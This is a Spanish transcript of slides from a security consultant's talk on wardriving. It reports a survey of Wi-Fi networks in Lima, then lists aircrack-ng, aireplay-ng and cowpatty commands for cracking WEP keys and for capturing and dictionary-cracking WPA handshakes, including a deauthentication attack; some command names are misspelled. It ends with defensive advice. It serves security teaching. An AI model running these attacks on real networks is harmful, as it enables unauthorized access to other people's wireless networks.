¿Qué es Wardriving?

Transcripción

¿Qué es Wardriving?
Omar Palomino - CEH
Consultor en Seguridad de Información
aula H4XOR
 Estadísticas de seguridad en Lima Metropolitana
 Técnicas para penetrar redes WEP
 Técnicas para penetrar redes WPA
 Demostración en vivo
Omar Palomino
Wardriving and wireless
penetration testing
¿Quién soy?
• Ing. Sistemas y Maestrista de Ing.
de Computación y Sistemas
• Consultor en Seguridad de
información - Digiware, CEH
• “10 años” de experiencia en
seguridad de información
• Psicólogo que aun no comienza sus
estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
¿Qué es Wardriving?
Es la búsqueda de redes inalámbricas Wi-Fi desde un
vehículo en movimiento. Cuando se realiza la misma
actividad caminando se le llama “warwalking”.
¿Qué es Wardriving?
Los hackers pintaban señales en las calles para “documentar”
las redes encontradas.
¿Nunca has visto esos símbolos?
En la actualidad se usan dispositivos GPS y GoogleEarth
para documentar las redes encontradas.
¿Nunca has visto esos símbolos?
¿Nunca has visto esos símbolos?
Inicio del proyecto: 01 Abril, 2011
Distritos:
Cercado Callao
San Isidro
San Miguel
Miraflores
La Molina
Los Olivos
San Borja
Proyecto Wardriving
Proyecto Wardriving
Redes WiFi – Lima Metropolitana
1%
29%
WEP: 28 531 redes
WPA :11 713 redes
Abiertas: 322 redes
70%
WEP
WPA
Abiertas
Proyecto Wardriving
DEMOSTRACIÓN DE
WARDRIVING
¿Es posible hackear redes WIFI?
WIRELESS
WEP
•
•
•
Sí, se puede hackear.
Capturar 40 mil – 120 mil paquetes
Tarda entre 10 min – 20 min
WAP
•
•
•
Depende de la complejidad de la
contraseña.
Rainbow tables
Tiempo indeterminado
Características WEP
RC4 = Rivest Cipher #4
Ataques FMS optimizado  H1KARI
Ataques KoreK (IVs únicos)
2004 se publica Aircrack poniendo en práctica los
ataques KoreK
La incorporación de inyección de paquetes mejoro
sustancialmente los tiempos
Características WPA
WPA
Modo Enterprise
Modo Personal
WPA2
Autenticación 802.1X / EAP
Autenticación 802.1x / EAP
Encriptación TPKI / MIC
Encriptación AES - CCMP
Autenticación: PSK
Autenticación: PSK
Encriptación TPKI / MIC
Encriptación AES - CCMP
Vulnerando redes WEP
Vamos a la
práctica – en vivo
Vulnerando redes WEP
Capturando paquetes
Shell# Airmong –ng
Shell# macchanger –mac 00:11:22:33:44:55
Shell# airmong start wlan0 <channel>
Shell# airodump-ng mon0
Shell# airodump-ng –c <channel> -w <file> --bssid <bssid> mon0
Inyectando paquetes
Shell# aireplay-ng -1 0 –a <bssid> -h 00:11:22:33:44:55 mon0
Shell# aireplay-ng -3 –b <bssid> -h 00:11:22:33:44:55 mon0
Obteniendo la contraseña
Shell# aircrak-ng –b <bssid> <file.cap>
Vulnerando redes WEP
Vulnerando redes WPA
Vamos a la
práctica – en vivo
Vulnerando redes WPA
PSK= PMK = PBKDF2 (frase, SSID, longitud SSID 4096,256)
Capturamos sólo el Handshake
Ataque 0 – deautenticación
Shell# aireplay –0 5 –a 00:30:BD:98:CE:62 –C 00:15:E9:B1:33:53
mon0
-0 = ataque de des-autenticación
5 = número de segundos que durará el ataque
-a = BSSID del AP
-c = mac del cliente
Vulnerando redes WPA
Comprobamos que hemos capturado el handshake:
Shell# aircrak-ng <file.cap>
Necesitamos un
diccionario!
3 Métodos de craking
1. Aircrack + Diccionario
Shell# aircrak-ng –w <diccionario_ruta> <handshake.cap>
2. Cowpatty + Diccionario (excesivo procesamiento)
Shell# cowpatty –f <diccionario_ruta> -r <handshake.cap> -s SSID
3. Cowpatty + genpmk (muy rápido, 20000 palabras por segundo)
Shell# genpmk –f <diccionario_ruta> -d HASHFILE –s SSID
Shell# cowpatty –r <handshake.cap> -d HASHFILE –s SSID
¿Cómo evito que me hackeen?
Olvídate de WEP, ni siquiera lo pienses!! Sí, a ti te digo!
Utiliza WPA con una contraseña con criterios de dificultad
Filtrado MAC y ocultar el SSID, tampoco lo pienses!
“Existen algunas soluciones que brindan WIDS/WIPS”
Gracias por participar
muy pronto estamos en provincias
para más información ingresa a nuestra web
En el 2012 mucho más de nosotros…
[email protected]

Documentos relacionados